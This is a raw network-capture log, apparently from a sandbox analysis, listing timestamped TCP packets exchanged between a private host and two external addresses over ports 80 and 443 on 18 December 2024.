                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.480513096 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.481607914 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.481622934 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.481662989 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.482211113 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.482223034 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.482254028 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.482808113 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.482856035 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.482959032 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.483964920 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.483978987 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.484023094 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.484430075 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.484605074 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.484647989 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.485291004 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.485335112 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.485992908 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.486413956 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.486427069 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.486470938 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.487025023 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.487068892 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.487193108 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.487960100 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.488017082 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.488725901 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.488739014 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.488785982 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.588345051 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.588362932 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.588421106 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.589423895 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.589437962 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.589488029 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.589807034 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.589821100 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.589863062 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.590681076 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.590692997 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.590739965 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.639389038 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.639484882 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.639525890 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.639542103 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.639863968 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.639945984 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.640393019 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.640707016 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.640757084 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.641377926 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.641416073 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.641802073 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.641880035 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.642075062 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.642141104 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.642913103 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.642978907 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.643266916 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.643537045 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.643752098 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.643814087 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.644399881 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.644609928 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.644680023 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.645284891 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.646106005 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.646141052 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.646152020 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.646347046 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.646401882 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.647039890 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.647243977 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.647325993 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.647994041 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.648085117 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.648130894 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.648669958 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.649027109 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.649081945 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.649666071 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.649924040 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.649971962 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.650330067 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.650367022 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.650571108 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.651186943 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.651691914 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.651839018 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.652029037 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.652066946 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.652111053 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.652865887 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.653687000 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.653724909 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.653747082 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.653892040 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.653945923 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.654793978 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.654829979 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.654870033 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.655694962 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.655802011 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.655955076 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.656426907 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.656462908 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.656523943 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.657368898 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.657538891 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.658056021 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.658111095 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.658328056 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.658382893 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.658818007 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.658854008 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.658915043 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.659645081 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.659682035 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.659735918 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.660554886 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.661140919 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.661196947 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.661391973 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.661427975 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.661484957 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.662256956 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.662293911 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.662626028 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.663012028 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.663830042 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.663866997 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.663878918 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.664067030 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.664123058 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.786207914 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:20.386837006 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:20.466562986 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:20.571446896 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:20.571470976 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:20.572030067 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:20.572045088 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:20.572086096 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:20.572101116 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:20.572112083 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:20.572151899 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:20.572782040 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:20.619792938 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:20.619940042 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:20.620059013 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:20.620080948 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:20.776487112 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.123430014 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.123478889 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.123560905 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.123591900 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.138931036 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.139013052 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.139039993 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.148964882 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.149017096 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.149046898 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.159415960 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.159482956 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.159506083 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.172947884 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.173007011 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.173047066 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.186819077 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.187993050 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.188019991 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.244925022 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.244981050 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.245012999 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.253669024 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.253745079 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.253776073 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.316361904 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.316443920 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.316478968 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.324615955 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.328008890 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.328036070 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.332829952 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.332904100 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.332911968 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.346244097 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.346273899 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.346896887 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.346906900 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.358351946 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.358403921 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.358412027 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.371989012 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.372073889 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.372081041 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.385668039 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.385736942 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.385745049 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.399605036 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.399683952 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.399691105 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.415098906 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.415158033 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.415174007 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.425879002 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.425931931 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.425939083 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.437602997 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.437640905 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.437649012 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.449549913 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.449594975 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.449604034 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.461608887 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.461651087 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.461661100 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.466245890 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.466427088 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.466746092 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.473176003 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.473225117 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.473231077 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.512732983 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.512798071 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.512810946 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.515446901 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.515491962 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.515501022 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.525398970 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.525454044 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.525460958 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.532040119 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.532104969 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.532115936 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.538326025 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.538374901 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.538382053 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.547455072 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.547501087 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.547508955 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.553343058 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.553440094 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.553447962 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.555941105 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.555979013 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.555986881 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.558991909 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.559058905 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.559067011 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.563533068 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.563616037 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.563623905 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.569550037 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.569591999 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.569616079 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.579298019 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.579355001 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.579370975 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.582772017 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.582813025 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.582822084 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.586226940 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.590210915 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.590281963 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.590291977 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.597893953 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.598094940 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.598104000 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.605334997 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.605407953 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.605417013 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.612921000 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.612993956 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.613004923 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.620021105 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.620137930 CET49791443192.168.2.6142.250.181.65
